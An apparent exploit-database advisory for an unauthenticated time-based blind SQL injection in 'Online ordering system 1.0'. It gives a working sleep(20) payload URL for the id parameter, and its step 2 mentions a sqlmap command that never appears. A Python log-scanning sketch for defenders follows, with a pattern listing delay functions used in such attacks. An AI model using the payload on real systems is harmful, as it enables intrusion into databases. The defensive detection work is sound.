Exploits / Vulnerability Discovered: 2021-03-04 | Type: webapps | Platform: php
This exploit / vulnerability, Online ordering system 1.0 blind SQL injection (unauthenticated), is for educational purposes only; if you use it, you do so at your own risk!
*Steps to Reproduce:*
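1) Visit http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 seconds in the response, which shows that the `sleep(20)` injected through the `id` parameter was executed by the database.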
2) Now run the following command in sqlmap.
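For defenders, the request in step 1 leaves a recognisable trace in the web server access log. The Python sketch below is an added example, not part of the original advisory: it URL-decodes each query parameter and flags values that call a database delay function, going slightly beyond the page by also covering the equivalents of `sleep()` in other database engines. It assumes the Apache/nginx "combined" log format; the log lines are constructed and the function name `find_time_based_probes` is hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [04/Mar/2021:10:00:01 +0000] "GET /onlineordering/GPST/admin/design.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Mar/2021:10:00:07 +0000] "GET /onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Mar/2021:10:01:12 +0000] "GET /onlineordering/GPST/admin/design.php?id=12%27%20AND%20SLEEP%2820%29%20AND%20%271%27%3D%271 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Mar/2021:10:02:00 +0000] "GET /blog/search.php?q=how+to+sleep+better HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Client address, then the quoted request line: METHOD target HTTP/x.y
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Delay primitives used by time-based blind SQL injection. Only sleep() appears
# on the page; the others are the equivalents in other engines (assumption:
# you want one rule that covers them all).
DELAY_RE = re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)


def find_time_based_probes(log_text):
    """Return (client_ip, path, parameter, decoded_value) for each suspicious parameter."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        url = urlsplit(m.group("target"))
        # parse_qsl percent-decodes values, so %28/%29 and mixed case are caught too.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if DELAY_RE.search(value):
                hits.append((m.group("ip"), url.path, name, value))
    return hits


if __name__ == "__main__":
    for ip, path, param, value in find_time_based_probes(SAMPLE_LOG):
        print(f"{ip} {path} param={param!r} value={value!r}")
```

The rule requires the opening parenthesis of a function call, so an ordinary search for the word "sleep" is not flagged. It only sees query strings; payloads sent in a request body need application or WAF logging.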